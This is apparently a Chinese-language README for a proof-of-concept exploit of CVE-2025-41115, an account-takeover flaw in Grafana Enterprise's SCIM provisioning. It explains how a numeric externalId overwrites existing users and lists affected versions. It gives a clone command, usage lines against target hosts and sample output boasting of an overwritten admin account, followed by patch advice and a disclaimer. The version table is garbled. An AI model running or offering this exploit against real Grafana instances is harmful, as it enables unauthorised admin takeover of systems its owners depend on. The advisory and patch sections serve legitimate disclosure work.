
Grafana Enterprise 中的严重 SCIM 权限提升漏洞
CVE-2025-41115 是 Grafana Enterprise 中影响其 SCIM 用户预配置 功能的一个 严重(CVSS 10.0) 漏洞。
当 SCIM 预配置已启用 且 user_sync_enabled = true 时,恶意 SCIM 客户端可以发送一个 数字类型的 externalId,Grafana 会错误地将其映射到内部用户 ID——从而允许攻击者 模拟 或 覆盖 现有账户,包括 管理员。
⚠️ Grafana OSS 不受影响。
利用所需条件:
enableSCIM = true[auth.scim] user_sync_enabled = true| 版本 | 状态 |
|---|---|
| 12.0.0 → 12.2.1 | ❌ 存在漏洞 |
| 12.3.0 | ✅ 已修复 |
| 12.2.1 (patched build) | ✅ 已修复 |
| 12.1.3 | ✅ 已修复 |
| 12.0.6 |
💡 托管 Grafana 服务(AWS/Azure/Grafana Cloud) 已由供应商完成修复。
sudo git clone https://github.com/B1ack4sh/Blackash-CVE-2025-41115.git
或者只需将上述脚本复制粘贴到一个文件中
chmod +x CVE-2025-41115.py
python3 CVE-2025-41115.py http://10.10.13.37:3000
# or
python3 CVE-2025-41115.py https://grafana.company.com
当利用实际成功时(即目标存在漏洞且令牌有效),你将看到类似如下的输出: text
[*] CVE-2025-41115 → Targeting http://10.10.13.37:3000
[*] Trying default/leaked tokens + your token...
[+] PWNED with token → glsa_XxXxXxXxXxXxXxXxXxXx...
[+] Login as: [email protected] (any password) → you are now Admin!
[+] Full response: {
"schemas": [
"urn:ietf:params:scim:schemas:core:2.0:User"
],
"id": "1", ←←← THIS IS THE KEY LINE (UID 1 overwritten)
"externalId": "1",
"meta": { ... },
"userName": "[email protected]",
"name": {
"formatted": "Pwned User"
},
"emails": [
{
"value": "[email protected]",
"primary": true
}
],
"active": true
}
更新至 12.3.0 或某个已修复的维护版本。
如果你不使用 SCIM 预配置,请确保你有:
enableSCIM = false
或
[auth.scim]
user_sync_enabled = false
查找:
externalId 使用确保只允许 受信任的身份提供商 与你的 SCIM 端点通信。
留意可疑的登录、用户创建事件或管理员接管。
此 PoC 仅供在您拥有或获得明确书面许可进行测试的系统上,用于授权的安全测试和教育用途。未经授权的使用是非法的,可能导致刑事起诉。作者和分发者不对滥用承担责任。请立即打补丁(≥12.0.6 / 12.3.0 以上)。
| ✅ 已修复 |